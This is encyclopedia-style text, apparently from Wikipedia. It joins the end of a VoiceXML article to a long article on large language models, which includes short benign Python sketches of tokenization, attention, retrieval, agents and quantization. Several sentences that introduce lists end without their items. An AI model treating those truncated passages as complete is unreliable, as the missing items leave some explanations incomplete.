VoiceXML 3.0 was slated to be the next major release of VoiceXML, with new major features. However, with the disbanding of the VoiceXML Forum in May 2022,[4] the development of the new standard was scrapped.
As of December 2022, there are few VoiceXML 2.0/2.1 platform implementations being offered.
The W3C's Speech Interface Framework also defines these other standards closely associated with VoiceXML.
The Speech Recognition Grammar Specification (SRGS) is used to tell the speech recognizer what sentence patterns it should expect to hear: these patterns are called grammars. Once the speech recognizer determines the most likely sentence it heard, it needs to extract the semantic meaning from that sentence and return it to the VoiceXML interpreter. This semantic interpretation is specified via the Semantic Interpretation for Speech Recognition (SISR) standard. SISR is used inside SRGS to specify the semantic results associated with the grammars, i.e., the set of ECMAScript assignments that create the semantic structure returned by the speech recognizer.
The Speech Synthesis Markup Language (SSML) is used to decorate textual prompts with information on how best to render them in synthetic speech, for example which speech synthesizer voice to use or when to speak louder or softer.
The Pronunciation Lexicon Specification (PLS) is used to define how words are pronounced. The generated pronunciation information is meant to be used by both speech recognizers and speech synthesizers in voice browsing applications.
The Call Control eXtensible Markup Language (CCXML) is a complementary W3C standard. A CCXML interpreter is used on some VoiceXML platforms to handle the initial call setup between the caller and the voice browser, and to provide telephony services like call transfer and disconnect to the voice browser. CCXML can also be used in non-VoiceXML contexts.
In media server applications, it is often necessary for several call legs to interact with each other, for example in a multi-party conference. Some deficiencies were identified in VoiceXML for this application and so companies designed specific scripting languages to deal with this environment. The Media Server Markup Language (MSML) was Convedia's solution, and Media Server Control Markup Language (MSCML) was Snowshore's solution. Snowshore is now owned by Dialogic and Convedia is now owned by Radisys. These languages also contain 'hooks' so that external scripts (like VoiceXML) can run on call legs where IVR functionality is required.
There was an IETF working group called mediactrl ("media control") that was working on a successor for these scripting systems, which it is hoped will progress to an open and widely adopted standard.[5] The mediactrl working group concluded in 2013.[6]
https://en.wikipedia.org/wiki/VoiceXML
A large language model (LLM) is a type of machine learning model designed for natural language processing tasks such as language generation. LLMs are language models with many parameters, and are trained with self-supervised learning on a vast amount of text.
The largest and most capable LLMs are generative pretrained transformers (GPTs). Modern models can be fine-tuned for specific tasks or guided by prompt engineering.[1] These models acquire predictive power regarding syntax, semantics, and ontologies[2] inherent in human language corpora, but they also inherit inaccuracies and biases present in the data they are trained on.[3]
Before 2017, there were a few language models that were large as compared to capacities then available. In the 1990s, the IBM alignment models pioneered statistical language modelling. A smoothed n-gram model in 2001 trained on 0.3 billion words achieved state-of-the-art perplexity at the time.[4] In the 2000s, as Internet use became prevalent, some researchers constructed Internet-scale language datasets ("web as corpus"[5]), upon which they trained statistical language models.[6][7] By 2009, statistical language models dominated over symbolic language models in most language-processing tasks because they could usefully ingest large datasets.[8]
After neural networks became dominant in image processing around 2012,[9] they were applied to language modelling as well. Google converted its translation service to Neural Machine Translation in 2016. Because it preceded the existence of transformers, it was done by seq2seq deep LSTM networks.
At the 2017 NeurIPS conference, Google researchers introduced the transformer architecture in their landmark paper "Attention Is All You Need". This paper's goal was to improve upon 2014 seq2seq technology,[10] and was based mainly on the attention mechanism developed by Bahdanau et al. in 2014.[11] The following year in 2018, BERT was introduced and quickly became "ubiquitous".[12] Though the original transformer has both encoder and decoder blocks, BERT is an encoder-only model. Academic and research usage of BERT began to decline in 2023, following rapid improvements in the abilities of decoder-only models (such as GPT) to solve tasks via prompting.[13]
Although decoder-only GPT-1 was introduced in 2018, it was GPT-2 in 2019 that caught widespread attention because OpenAI at first deemed it too powerful to release publicly, out of fear of malicious use.[14] GPT-3 in 2020 went a step further and as of 2024 is available only via API with no offering of downloading the model to execute locally. But it was the 2022 consumer-facing browser-based ChatGPT that captured the imaginations of the general population and caused some media hype and online buzz.[15] The 2023 GPT-4 was praised for its increased accuracy and as a "holy grail" for its multimodal capabilities.[16] OpenAI did not reveal the high-level architecture and the number of parameters of GPT-4. The release of ChatGPT led to an uptick in LLM usage across several research subfields of computer science, including robotics, software engineering, and societal impact work.[13] In 2024 OpenAI released the reasoning model OpenAI o1, which generates long chains of thought before returning a final answer.
Competing language models have for the most part been attempting to equal the GPT series, at least in terms of number of parameters.[17]
Since 2022, source-available models have been gaining popularity, especially at first with BLOOM and LLaMA, though both have restrictions on the field of use. Mistral AI's models Mistral 7B and Mixtral 8x7B have the more permissive Apache License. In January 2025, DeepSeek released DeepSeek R1, a 671-billion-parameter open-weight model that performs comparably to OpenAI o1 but at a much lower cost.[18]
Since 2023, many LLMs have been trained to be multimodal, having the ability to also process or generate other types of data, such as images or audio. These LLMs are also called large multimodal models (LMMs).[19]
As of 2024, the largest and most capable models are all based on the transformer architecture. Some recent implementations are based on other architectures, such as recurrent neural network variants and Mamba (a state space model).[20][21][22]
As machine learning algorithms process numbers rather than text, the text must be converted to numbers. In the first step, a vocabulary is decided upon, then integer indices are arbitrarily but uniquely assigned to each vocabulary entry, and finally, an embedding is associated to the integer index. Algorithms include byte-pair encoding (BPE) and WordPiece. There are also special tokens serving as control characters, such as [MASK] for a masked-out token (as used in BERT), and [UNK] ("unknown") for characters not appearing in the vocabulary. Also, some special symbols are used to denote special text formatting. For example, "Ġ" denotes a preceding whitespace in RoBERTa and GPT. "##" denotes continuation of a preceding word in BERT.[23]
For example, the BPE tokenizer used by GPT-3 (Legacy) would split the text tokenizer: texts -> series of numerical "tokens" into a series of numerical tokens.
Tokenization also compresses the datasets. Because LLMs generally require input to be an array that is not jagged, the shorter texts must be "padded" until they match the length of the longest one. How many tokens are, on average, needed per word depends on the language of the dataset.[24][25]
As an example, consider a tokenizer based on byte-pair encoding. In the first step, all unique characters (including blanks and punctuation marks) are treated as an initial set of n-grams (i.e. an initial set of uni-grams). Successively, the most frequent pair of adjacent characters is merged into a bi-gram and all instances of the pair are replaced by it. All occurrences of adjacent pairs of (previously merged) n-grams that most frequently occur together are then again merged into even lengthier n-grams, until a vocabulary of prescribed size is obtained (in the case of GPT-3, the size is 50257).[26] After a tokenizer is trained, any text can be tokenized by it, as long as it does not contain characters not appearing in the initial set of uni-grams.[27]
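The merging procedure described above can be sketched as a short program (a simplified character-level trainer, not the byte-level implementation used by GPT models):

```python
from collections import Counter

def train_bpe(text, vocab_size):
    # Start from single characters: the initial set of uni-grams.
    tokens = list(text)
    vocab = set(tokens)
    while len(vocab) < vocab_size:
        # Count adjacent pairs and merge the most frequent one.
        pairs = Counter(zip(tokens, tokens[1:]))
        if not pairs:
            break
        (a, b), count = pairs.most_common(1)[0]
        if count < 2:       # no pair repeats; nothing useful left to merge
            break
        merged = a + b
        vocab.add(merged)
        # Replace every occurrence of the pair with the merged n-gram.
        new_tokens, i = [], 0
        while i < len(tokens):
            if i + 1 < len(tokens) and tokens[i] == a and tokens[i + 1] == b:
                new_tokens.append(merged)
                i += 2
            else:
                new_tokens.append(tokens[i])
                i += 1
        tokens = new_tokens
    return vocab, tokens
```

Running it on the toy string "aaabdaaabac" with a vocabulary budget of 20 merges "aa", then "aaa", then "aaab", and stops once no adjacent pair occurs more than once.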
A token vocabulary based on the frequencies extracted from mainly English corpora uses as few tokens as possible for an average English word. However, an average word in another language encoded by such an English-optimized tokenizer is split into a suboptimal number of tokens. The GPT-2 tokenizer can use up to 15 times more tokens per word for some languages, for example for the Shan language from Myanmar. Even more widespread languages such as Portuguese and German have "a premium of 50%" compared to English.[25]
Greedy tokenization also causes subtle problems with text completion.[28]
In the context of training LLMs, datasets are typically cleaned by removing low-quality, duplicated, or toxic data.[29]Cleaned datasets can increase training efficiency and lead to improved downstream performance.[30][31]A trained LLM can be used to clean datasets for training a further LLM.[32]
With the increasing proportion of LLM-generated content on the web, data cleaning in the future may include filtering out such content. LLM-generated content can pose a problem if the content is similar to human text (making filtering difficult) but of lower quality (degrading performance of models trained on it).[33]
Training the largest language models may require more linguistic data than is naturally available, or the naturally occurring data may be of insufficient quality. In these cases, synthetic data might be used. Microsoft's Phi series of LLMs is trained on textbook-like data generated by another LLM.[34]
Reinforcement learning from human feedback (RLHF) through algorithms, such as proximal policy optimization, is used to further fine-tune a model based on a dataset of human preferences.[35]
Using "self-instruct" approaches, LLMs have been able to bootstrap correct responses, replacing any naive responses, starting from human-generated corrections of a few cases. For example, in the instruction "Write an essay about the main themes represented in Hamlet," an initial naive completion might be "If you submit the essay after March 17, your grade will be reduced by 10% for each day of delay," based on the frequency of this textual sequence in the corpus.[36]
The largest LLMs may be too expensive to train and use directly. For such models, mixture of experts (MoE) can be applied, a line of research pursued by Google researchers since 2017 to train models reaching up to 1 trillion parameters.[37][38][39]
Most results previously achievable only by (costly) fine-tuning can be achieved through prompt engineering, although limited to the scope of a single conversation (more precisely, limited to the scope of a context window).[40]
In order to find out which tokens are relevant to each other within the scope of the context window, the attention mechanism calculates "soft" weights for each token, more precisely for its embedding, by using multiple attention heads, each with its own "relevance" for calculating its own soft weights. For example, the small (i.e. 117M-parameter) GPT-2 model has twelve attention heads and a context window of only 1k tokens.[42] In its medium version it has 345M parameters and contains 24 layers, each with 12 attention heads. For training with gradient descent, a batch size of 512 was used.[27]
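The mechanism can be sketched as scaled dot-product attention with several heads run in parallel and concatenated. The dimensions and weight matrices below are toy stand-ins, not GPT-2's trained parameters:

```python
import numpy as np

def softmax(x):
    e = np.exp(x - x.max(axis=-1, keepdims=True))
    return e / e.sum(axis=-1, keepdims=True)

def attention_head(X, Wq, Wk, Wv):
    # One head: each token attends to every token in the window.
    Q, K, V = X @ Wq, X @ Wk, X @ Wv
    scores = Q @ K.T / np.sqrt(K.shape[-1])  # pairwise relevance
    weights = softmax(scores)                # "soft" weights, rows sum to 1
    return weights @ V

rng = np.random.default_rng(0)
n_tokens, d_model, d_head = 8, 64, 16        # toy sizes for illustration
X = rng.normal(size=(n_tokens, d_model))     # token embeddings
heads = [attention_head(X, *(rng.normal(size=(d_model, d_head))
                             for _ in range(3)))
         for _ in range(12)]                 # twelve heads, as in GPT-2 small
out = np.concatenate(heads, axis=-1)         # head outputs are concatenated
assert out.shape == (n_tokens, 12 * d_head)
```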
The largest models, such as Google's Gemini 1.5, presented in February 2024, can have a context window sized up to 1 million tokens (a context window of 10 million was also "successfully tested").[43] Other models with large context windows include Anthropic's Claude 2.1, with a context window of up to 200k tokens.[44] Note that this maximum refers to the number of input tokens and that the maximum number of output tokens differs from the input and is often smaller. For example, the GPT-4 Turbo model has a maximum output of 4096 tokens.[45]
The length of a conversation that the model can take into account when generating its next answer is likewise limited by the size of the context window. If the length of a conversation, for example with ChatGPT, is longer than its context window, only the parts inside the context window are taken into account when generating the next answer, or the model needs to apply some algorithm to summarize the too-distant parts of the conversation.
The shortcomings of making a context window larger include higher computational cost and possibly diluting the focus on local context, while making it smaller can cause a model to miss an important long-range dependency. Balancing them is a matter of experimentation and domain-specific considerations.
A model may be pre-trained either to predict how the segment continues, or what is missing in the segment, given a segment from its training dataset.[46]It can be either
Models may be trained on auxiliary tasks which test their understanding of the data distribution, such as Next Sentence Prediction (NSP), in which pairs of sentences are presented and the model must predict whether they appear consecutively in the training corpus.[47] During training, regularization loss is also used to stabilize training. However, regularization loss is usually not used during testing and evaluation.
Substantial infrastructure is necessary for training the largest models.[48][49][50]
The qualifier "large" in "large language model" is inherently vague, as there is no definitive threshold for the number of parameters required to qualify as "large". As time goes on, what was previously considered "large" may evolve. GPT-1 of 2018 is usually considered the first LLM, even though it has only 0.117 billion parameters. The tendency towards larger models is visible in the list of large language models.
As technology advanced, large sums have been invested in increasingly large models. For example, training of the GPT-2 (i.e. a 1.5-billion-parameters model) in 2019 cost $50,000, while training of the PaLM (i.e. a 540-billion-parameters model) in 2022 cost $8 million, and Megatron-Turing NLG 530B (in 2021) cost around $11 million.[51]
For Transformer-based LLMs, training cost is much higher than inference cost. It costs 6 FLOPs per parameter to train on one token, whereas it costs 1 to 2 FLOPs per parameter to infer on one token.[52]
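These rules of thumb give a back-of-the-envelope cost estimate. The model and token counts below are illustrative, not taken from any specific system:

```python
# ~6 FLOPs per parameter per training token;
# ~2 FLOPs per parameter per inferred token (forward pass only).
def train_flops(n_params, n_tokens):
    return 6 * n_params * n_tokens

def infer_flops(n_params, n_tokens):
    return 2 * n_params * n_tokens

# Example: a 70-billion-parameter model trained on 1.4 trillion tokens.
print(f"{train_flops(70e9, 1.4e12):.2e}")  # 5.88e+23 FLOPs
```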
There are certain tasks that, in principle, cannot be solved by any LLM, at least not without the use of external tools or additional software. An example of such a task is responding to the user's input '354 * 139 = ', provided that the LLM has not already encountered a continuation of this calculation in its training corpus. In such cases, the LLM needs to resort to running program code that calculates the result, which can then be included in its response. Another example is "What is the time now? It is ", where a separate program interpreter would need to execute code to get the system time on the computer, so that the LLM can include it in its reply.[53][54] This basic strategy can be sophisticated with multiple attempts of generated programs, and other sampling strategies.[55]
Generally, in order to get an LLM to use tools, one must fine-tune it for tool use. If the number of tools is finite, then fine-tuning may be done just once. If the number of tools can grow arbitrarily, as with online API services, then the LLM can be fine-tuned to be able to read API documentation and call APIs correctly.[56][57]
Retrieval-augmented generation (RAG) is another approach that enhances LLMs by integrating them with document retrieval systems. Given a query, a document retriever is called to retrieve the most relevant documents. This is usually done by encoding the query and the documents into vectors, then finding the documents with vectors (usually stored in a vector database) most similar to the vector of the query. The LLM then generates an output based on both the query and context included from the retrieved documents.[58]
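A minimal sketch of the retrieval step follows. The `embed` function here is a hypothetical stand-in (a real system would call a trained embedding model), but the shape of the pipeline is the same: embed, rank by vector similarity, prepend the winners to the prompt:

```python
import numpy as np

def embed(text, dim=64):
    # Stand-in embedding (hypothetical): hash character trigrams
    # into a normalized vector. A real system would use a trained model.
    v = np.zeros(dim)
    for i in range(len(text) - 2):
        v[hash(text[i:i + 3]) % dim] += 1.0
    n = np.linalg.norm(v)
    return v / n if n else v

def retrieve(query, documents, k=2):
    # Rank documents by cosine similarity to the query vector.
    q = embed(query)
    scores = [(float(embed(d) @ q), d) for d in documents]
    return [d for _, d in sorted(scores, reverse=True)[:k]]

docs = ["VoiceXML is a W3C standard.",
        "LLMs are trained on vast amounts of text.",
        "Perplexity measures prediction quality."]
context = retrieve("How are language models trained?", docs)
# The retrieved context is prepended to the query before generation.
prompt = "Context:\n" + "\n".join(context) + "\n\nQuestion: How are LLMs trained?"
```

In production the document vectors would be precomputed and stored in a vector database rather than re-embedded per query.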
An LLM is typically not an autonomous agent by itself, as it lacks the ability to interact with dynamic environments, recall past behaviors, and plan future actions, but can be transformed into one by integrating modules like profiling, memory, planning, and action.[59]
The ReAct pattern, a portmanteau of "Reason + Act", constructs an agent out of an LLM, using the LLM as a planner. The LLM is prompted to "think out loud". Specifically, the language model is prompted with a textual description of the environment, a goal, a list of possible actions, and a record of the actions and observations so far. It generates one or more thoughts before generating an action, which is then executed in the environment.[60] The linguistic description of the environment given to the LLM planner can even be the LaTeX code of a paper describing the environment.[61]
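The loop can be sketched as follows; `llm` and `env` are hypothetical stand-ins (a scripted "model" and a dictionary "environment") used only to make the control flow concrete:

```python
def react_step(llm, env, transcript):
    # One ReAct iteration: the model emits "Thought: ...\nAction: ..." text,
    # the named action is executed, and the observation joins the record.
    reply = llm(transcript)
    thought, action = [line.split(": ", 1)[1]
                       for line in reply.splitlines()[:2]]
    transcript += reply + "\n"
    if action != "finish":
        transcript += f"Observation: {env(action)}\n"
    return transcript, action

# Toy stand-ins: a scripted "model" and a lookup "environment".
script = iter(["Thought: I should check the time.\nAction: clock",
               "Thought: I have the answer.\nAction: finish"])
llm = lambda _: next(script)
env = lambda action: {"clock": "12:00"}[action]

t = "Goal: report the time.\n"
t, action = react_step(llm, env, t)   # thinks, acts, observes "12:00"
t, action = react_step(llm, env, t)   # decides it is done
assert action == "finish"
```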
In the DEPS ("Describe, Explain, Plan and Select") method, an LLM is first connected to the visual world via image descriptions, then it is prompted to produce plans for complex tasks and behaviors based on its pretrained knowledge and environmental feedback it receives.[62]
The Reflexion method[63] constructs an agent that learns over multiple episodes. At the end of each episode, the LLM is given the record of the episode, and prompted to think up "lessons learned", which would help it perform better at a subsequent episode. These "lessons learned" are given to the agent in the subsequent episodes.[citation needed]
Monte Carlo tree search can use an LLM as a rollout heuristic. When a programmatic world model is not available, an LLM can also be prompted with a description of the environment to act as the world model.[64]
For open-ended exploration, an LLM can be used to score observations for their "interestingness", which can be used as a reward signal to guide a normal (non-LLM) reinforcement learning agent.[65] Alternatively, it can propose increasingly difficult tasks for curriculum learning.[66] Instead of outputting individual actions, an LLM planner can also construct "skills", or functions for complex action sequences. The skills can be stored and later invoked, allowing increasing levels of abstraction in planning.[66]
LLM-powered agents can keep a long-term memory of their previous contexts, and the memory can be retrieved in the same way as in retrieval-augmented generation. Multiple such agents can interact socially.[67]
Typically, LLMs are trained with single- or half-precision floating point numbers (float32 and float16). One float16 has 16 bits, or 2 bytes, and so one billion parameters require 2 gigabytes. The largest models typically have 100 billion parameters, requiring 200 gigabytes to load, which places them outside the range of most consumer electronics.[68]
Post-training quantization[69] aims to decrease the space requirement by lowering the precision of the parameters of a trained model, while preserving most of its performance.[70][71] The simplest form of quantization simply truncates all numbers to a given number of bits. It can be improved by using a different quantization codebook per layer. Further improvement can be done by applying different precisions to different parameters, with higher precision for particularly important parameters ("outlier weights").[72] A visual guide to quantization is provided by Maarten Grootendorst.[73]
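The simplest scheme described above can be sketched as symmetric 8-bit quantization with a single scale per tensor (per-layer codebooks and mixed precision refine this idea):

```python
import numpy as np

def quantize_int8(w):
    # Symmetric "absmax" quantization: map floats onto int8 with one scale.
    scale = np.abs(w).max() / 127.0
    q = np.clip(np.round(w / scale), -127, 127).astype(np.int8)
    return q, scale

def dequantize(q, scale):
    return q.astype(np.float32) * scale

w = np.random.default_rng(0).normal(size=1000).astype(np.float32)
q, s = quantize_int8(w)
# int8 storage is 4x smaller than float32; round-off error is at most scale/2.
err = np.abs(dequantize(q, s) - w).max()
assert err <= s / 2 + 1e-6
```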
While quantized models are typically frozen, and only pre-quantized models are fine-tuned, quantized models can still be fine-tuned.[74]
Multimodality means "having several modalities", and a "modality" refers to a type of input or output, such as video, image, audio, text, proprioception, etc.[75] There have been many AI models trained specifically to ingest one modality and output another modality, such as AlexNet for image to label,[76] visual question answering for image-text to text,[77] and speech recognition for speech to text.
A common method to create multimodal models out of an LLM is to "tokenize" the output of a trained encoder. Concretely, one can construct an LLM that can understand images as follows: take a trained LLM, and take a trained image encoder E. Make a small multilayered perceptron f, so that for any image y, the post-processed vector f(E(y)) has the same dimensions as an encoded token. That is an "image token". Then, one can interleave text tokens and image tokens. The compound model is then fine-tuned on an image-text dataset. This basic construction can be applied with more sophistication to improve the model. The image encoder may be frozen to improve stability.[78]
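A sketch of the projection step follows; random vectors stand in for the trained encoder output and MLP parameters, since only the shapes matter here:

```python
import numpy as np

# Project an image embedding into the LLM's token-embedding space with a
# small MLP f, so that f(E(y)) can be interleaved with text-token embeddings.
d_image, d_hidden, d_token = 512, 1024, 768   # illustrative dimensions

def f(v, W1, b1, W2, b2):
    h = np.maximum(W1 @ v + b1, 0)            # one hidden ReLU layer
    return W2 @ h + b2

rng = np.random.default_rng(0)
W1, b1 = rng.normal(size=(d_hidden, d_image)), np.zeros(d_hidden)
W2, b2 = rng.normal(size=(d_token, d_hidden)), np.zeros(d_token)

E_y = rng.normal(size=d_image)                # output of a frozen encoder E
image_token = f(E_y, W1, b1, W2, b2)
assert image_token.shape == (d_token,)        # same shape as a text token
```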
Flamingo demonstrated the effectiveness of the tokenization method, finetuning a pair of pretrained language model and image encoder to perform better on visual question answering than models trained from scratch.[79] The Google PaLM model was fine-tuned into a multimodal model PaLM-E using the tokenization method, and applied to robotic control.[80] LLaMA models have also been turned multimodal using the tokenization method, to allow image inputs[81] and video inputs.[82]
GPT-4 can use both text and image as inputs[83] (although the vision component was not released to the public until GPT-4V[84]); Google DeepMind's Gemini is also multimodal.[85] Mistral introduced its own multimodal Pixtral 12B model in September 2024.[86]
In late 2024, a new direction emerged in LLM development with models specifically designed for complex reasoning tasks. These "reasoning models" were trained to spend more time generating step-by-step solutions before providing final answers, similar to human problem-solving processes.[87] OpenAI introduced this trend with their o1 model in September 2024, followed by o3 in December 2024. These models showed significant improvements in mathematics, science, and coding tasks compared to traditional LLMs. For example, on International Mathematical Olympiad qualifying exam problems, GPT-4o achieved 13% accuracy while o1 reached 83%.[87][88] In January 2025, the Chinese company DeepSeek released DeepSeek-R1, a 671-billion-parameter open-weight reasoning model that achieved comparable performance to OpenAI's o1 while being significantly more cost-effective to operate. Unlike proprietary models from OpenAI, DeepSeek-R1's open-weight nature allowed researchers to study and build upon the algorithm, though its training data remained private.[89] These reasoning models typically require more computational resources per query compared to traditional LLMs, as they perform more extensive processing to work through problems step-by-step. However, they have shown superior capabilities in domains requiring structured logical thinking, such as mathematics, scientific research, and computer programming.[88]
Efforts to reduce or compensate for hallucinations have employed automated reasoning, RAG (retrieval-augmented generation), fine-tuning, and other methods.[90]
The performance of an LLM after pretraining largely depends on the:
"Scaling laws" are empirical statistical laws that predict LLM performance based on such factors. One particular scaling law ("Chinchilla scaling") for LLMs autoregressively trained for one epoch, with a log-log learning rate schedule, states that:[91]{\displaystyle {\begin{cases}C=C_{0}ND\\[6pt]L={\frac {A}{N^{\alpha }}}+{\frac {B}{D^{\beta }}}+L_{0}\end{cases}}}where the variables are C, the cost of training the model in FLOPs; N, the number of parameters in the model; D, the number of tokens in the training set; and L, the average negative log-likelihood loss per token achieved by the trained LLM on the test dataset,
and the statistical hyper-parameters are C_0 = 6 (i.e. 6 FLOPs per parameter to train on one token), α = 0.34, β = 0.28, A = 406.4, B = 410.7, and L_0 = 1.69.
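Under the fitted constants from the Chinchilla paper (treated here as approximate), the law can be evaluated directly:

```python
# Chinchilla loss curve L(N, D); constants from Hoffmann et al. (2022),
# treated as approximate fitted values.
A, B, L0 = 406.4, 410.7, 1.69
alpha, beta = 0.34, 0.28

def loss(n_params, n_tokens):
    return A / n_params**alpha + B / n_tokens**beta + L0

def flops(n_params, n_tokens, c0=6):
    return c0 * n_params * n_tokens

# e.g. a 70B-parameter model trained on 1.4T tokens (Chinchilla's own scale):
print(loss(70e9, 1.4e12))   # ≈ 1.94 nats per token
```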
Performance of bigger models on various tasks, when plotted on a log-log scale, appears as a linear extrapolation of performance achieved by smaller models. However, this linearity may be punctuated by "break(s)"[92] in the scaling law, where the slope of the line changes abruptly, and where larger models acquire "emergent abilities".[40][93] They arise from the complex interaction of the model's components and are not explicitly programmed or designed.[94]
Furthermore, recent research has demonstrated that AI systems, including large language models, can employ heuristic reasoning akin to human cognition. They balance between exhaustive logical processing and the use of cognitive shortcuts (heuristics), adapting their reasoning strategies to optimize between accuracy and effort. This behavior aligns with principles of resource-rational human cognition, as discussed in classical theories of bounded rationality and dual-process theory.[95]
One of the emergent abilities is in-context learning from example demonstrations.[96] In-context learning is involved in tasks such as:
Schaeffer et al. argue that the emergent abilities are not unpredictably acquired, but predictably acquired according to a smooth scaling law. The authors considered a toy statistical model of an LLM solving multiple-choice questions, and showed that this statistical model, modified to account for other types of tasks, applies to these tasks as well.[102]
Let x be the number of parameters of the model, and y be its performance.
Large language models by themselves are black boxes, and it is not clear how they can perform linguistic tasks. Similarly, it is unclear if or how LLMs should be viewed as models of the human brain and/or human mind.[103]
Various techniques have been developed to enhance the transparency and interpretability of LLMs. Mechanistic interpretability aims to reverse-engineer LLMs by discovering symbolic algorithms that approximate the inference performed by an LLM. In recent years, sparse coding models such as sparse autoencoders, transcoders, and crosscoders have emerged as promising tools for identifying interpretable features.
Transcoders, which are more interpretable than transformers, have been utilized to develop "replacement models". In one such study involving the mechanistic interpretation of writing a rhyming poem by an LLM, it was shown that although LLMs are believed to simply predict the next token, they can, in fact, plan ahead.[104]
A related concept isAI explainability, which focuses on understanding how an AI model arrives at a given result. Techniques such as partial dependency plots, SHAP (SHapley Additive exPlanations), and feature importance assessments allow researchers to visualize and understand the contributions of various input features to the model's predictions. These methods help ensure that AI models make decisions based on relevant and fair criteria, enhancing trust and accountability.
By integrating these techniques, researchers and practitioners can gain deeper insights into the operations of LLMs, fostering trust and facilitating the responsible deployment of these powerful models.
In another example, the authors trained small transformers on modular arithmetic addition. The resulting models were reverse-engineered, and it turned out they used discrete Fourier transform.[105]
NLP researchers were evenly split when asked, in a 2022 survey, whether (untuned) LLMs "could (ever) understand natural language in some nontrivial sense".[106]Proponents of "LLM understanding" believe that some LLM abilities, such as mathematical reasoning, imply an ability to"understand"certain concepts. A Microsoft team argued in 2023 that GPT-4 "can solve novel and difficult tasks that span mathematics, coding, vision, medicine, law, psychology and more" and that GPT-4 "could reasonably be viewed as an early (yet still incomplete) version of anartificial general intelligencesystem": "Can one reasonably say that a system that passes exams for software engineering candidates is notreallyintelligent?"[107][108]Ilya Sutskeverargues that predicting the next word sometimes involves reasoning and deep insights, for example if the LLM has to predict the name of the criminal in an unknown detective novel after processing the entire story leading up to the revelation.[109]Some researchers characterize LLMs as "alien intelligence".[110][111]For example, Conjecture CEOConnor Leahyconsiders untuned LLMs to be like inscrutable alien "Shoggoths", and believes that RLHF tuning creates a "smiling facade" obscuring the inner workings of the LLM: "If you don't push it too far, the smiley face stays on. But then you give it [an unexpected] prompt, and suddenly you see this massive underbelly of insanity, of weird thought processes and clearly non-human understanding."[112][113]
In contrast, some skeptics of LLM understanding believe that existing LLMs are "simply remixing and recombining existing writing",[111]a phenomenon known asstochastic parrot, or they point to the deficits existing LLMs continue to have in prediction skills, reasoning skills, agency, and explainability.[106]For example, GPT-4 has natural deficits in planning and in real-time learning.[108]Generative LLMs have been observed to confidently assert claims of fact which do not seem to bejustifiedby theirtraining data, a phenomenon which has been termed "hallucination".[114]Specifically, hallucinations in the context of LLMs correspond to the generation of text or responses that seem syntactically sound, fluent, and natural but are factually incorrect, nonsensical, or unfaithful to the provided source input.[115]NeuroscientistTerrence Sejnowskihas argued that "The diverging opinions of experts on the intelligence of LLMs suggests that our old ideas based on natural intelligence are inadequate".[106]
The matter of LLMs exhibiting intelligence or understanding has two main aspects – the first is how to model thought and language in a computer system, and the second is how to enable the computer system to generate human-like language.[106] These aspects of language as a model of cognition have been developed in the field of cognitive linguistics. American linguist George Lakoff presented the Neural Theory of Language (NTL)[116] as a computational basis for using language as a model of learning tasks and understanding. The NTL model outlines how specific neural structures of the human brain shape the nature of thought and language, and in turn what computational properties of such neural systems can be applied to model thought and language in a computer system. After a framework for modeling language in a computer system was established, the focus shifted to establishing frameworks for computer systems to generate language with acceptable grammar. In his 2014 book The Language Myth: Why Language Is Not An Instinct, British cognitive linguist and digital communication technologist Vyvyan Evans mapped out the role of probabilistic context-free grammar (PCFG) in enabling NLP to model cognitive patterns and generate human-like language.[117][118]
The canonical measure of the performance of an LLM is its perplexity on a given text corpus. Perplexity measures how well a model predicts the contents of a dataset; the higher the likelihood the model assigns to the dataset, the lower the perplexity. In mathematical terms, perplexity is the exponential of the average negative log likelihood per token.
log(Perplexity) = −(1/N) Σᵢ₌₁ᴺ log Pr(tokenᵢ | context for tokenᵢ)
Here, N is the number of tokens in the text corpus, and "context for token i" depends on the specific type of LLM. If the LLM is autoregressive, then "context for token i" is the segment of text appearing before token i. If the LLM is masked, then it is the segment of text surrounding token i.
Because language models may overfit to training data, models are usually evaluated by their perplexity on a test set.[47] This evaluation is potentially problematic for larger models which, as they are trained on increasingly large corpora of text, are increasingly likely to inadvertently include portions of any given test set.[1]
In information theory, the concept of entropy is intricately linked to perplexity, a relationship notably established by Claude Shannon.[119] This relationship is mathematically expressed as Entropy = log₂(Perplexity).
Entropy, in this context, is commonly quantified in terms of bits per word (BPW) or bits per character (BPC), which hinges on whether the language model utilizes word-based or character-based tokenization.
Notably, in the case of larger language models that predominantly employ sub-word tokenization, bits per token (BPT) emerges as a seemingly more appropriate measure. However, because tokenization methods vary across large language models, BPT does not serve as a reliable metric for comparative analysis among diverse models. To convert BPT into BPW, one can multiply it by the average number of tokens per word.
In the evaluation and comparison of language models, cross-entropy is generally the preferred metric over entropy. The underlying principle is that a lower BPW is indicative of a model's enhanced capability for compression. This, in turn, reflects the model's proficiency in making accurate predictions.
Benchmarks are used to evaluate LLM performance on specific tasks. Tests evaluate capabilities such as general knowledge, bias, commonsense reasoning, question answering, and mathematical problem-solving. Composite benchmarks examine multiple capabilities. Results are often sensitive to the prompting method.[120][121]
A question answering benchmark is termed "open book" if the model's prompt includes text from which the expected answer can be derived (for example, the previous question could be combined with text that includes the sentence "The Sharks have advanced to the Stanley Cup finals once, losing to the Pittsburgh Penguins in 2016."[122]). Otherwise, the task is considered "closed book", and the model must draw solely on its training.[123] Examples of composite benchmarks include GLUE, SuperGLUE, MMLU, BIG-bench, HELM, and HLE (Humanity's Last Exam).[119][123]
LLM bias may be assessed through benchmarks such as CrowS-Pairs (Crowdsourced Stereotype Pairs),[124] StereoSet,[125] and Parity Benchmark.[126]
Fact-checking and misinformation detection benchmarks are available. A 2023 study compared the fact-checking accuracy of LLMs including ChatGPT 3.5 and 4.0, Bard, and Bing AI against independent fact-checkers such as PolitiFact and Snopes. The results demonstrated moderate proficiency, with GPT-4 achieving the highest accuracy at 71%, lagging behind human fact-checkers.[127]
It was previously standard to evaluate on a held-out portion of the evaluation dataset. It has since become more common to evaluate a pre-trained model directly through prompting techniques. Researchers vary in how they formulate prompts for particular tasks, particularly with respect to the number of correct examples attached to the prompt (i.e. the value of n in n-shot prompting).
Typical datasets consist of pairs of questions and correct answers, for example, ("Have the San Jose Sharks won the Stanley Cup?", "No").[122] Some examples of commonly used question answering datasets include TruthfulQA, Web Questions, TriviaQA, and SQuAD.[123]
Evaluation datasets may also take the form of text completion, having the model select the most likely word or sentence to complete a prompt, for example: "Alice was friends with Bob. Alice went to visit her friend, ____".[1]
Datasets are of varying quality and may contain questions that are mislabeled, ambiguous, unanswerable, or otherwise of low-quality.[128]
